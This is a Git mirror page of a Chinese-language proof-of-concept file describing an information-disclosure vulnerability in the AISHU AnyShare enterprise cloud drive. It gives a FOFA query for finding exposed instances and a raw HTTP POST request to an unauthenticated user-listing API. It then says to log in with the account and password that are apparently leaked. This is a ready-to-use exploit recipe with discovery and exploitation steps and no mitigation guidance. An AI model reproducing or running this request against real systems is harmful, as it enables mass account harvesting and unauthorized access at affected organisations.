admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/爱数企业网盘/爱数企业云盘存在信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 爱数企业云盘存在信息泄露漏洞
# 一、漏洞简介
爱数企业云盘是一个备受欢迎的企业级云存储解决方案其主要特点包括1、数据安全性高2、存储容量大3、访问便捷。爱数企业云盘通过多重加密和权限控制保障了企业数据的安全性。其大容量存储可以满足企业大量数据存储需求并且用户可以通过多种设备便捷访问数据。爱数企业云盘存在任意信息泄露漏洞
# 二、影响版本
爱数企业云盘
# 三、资产测绘
+ fofa`app="AISHU-AnyShare"`
+ 特征
![1730710857097-161efd6a-0577-47d8-a3d6-a82d1634dc19.png](./img/nfcJYEdXCi3NMsDs/1730710857097-161efd6a-0577-47d8-a3d6-a82d1634dc19-105570.png)
# 三、漏洞复现
```java
POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
Host:
[1,100]
```
![1730710998770-27410fe5-6d05-4d12-8c3b-080e4dc815ac.png](./img/nfcJYEdXCi3NMsDs/1730710998770-27410fe5-6d05-4d12-8c3b-080e4dc815ac-017381.png)
使用账号密码登录
![1730710969054-6267588d-2c93-466a-a855-f31713dfc801.png](./img/nfcJYEdXCi3NMsDs/1730710969054-6267588d-2c93-466a-a855-f31713dfc801-355450.png)
> 更新: 2024-11-27 10:00:07
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lw5f2lpcye0l5ez8>
Reference in New Issue View Git Blame Copy Permalink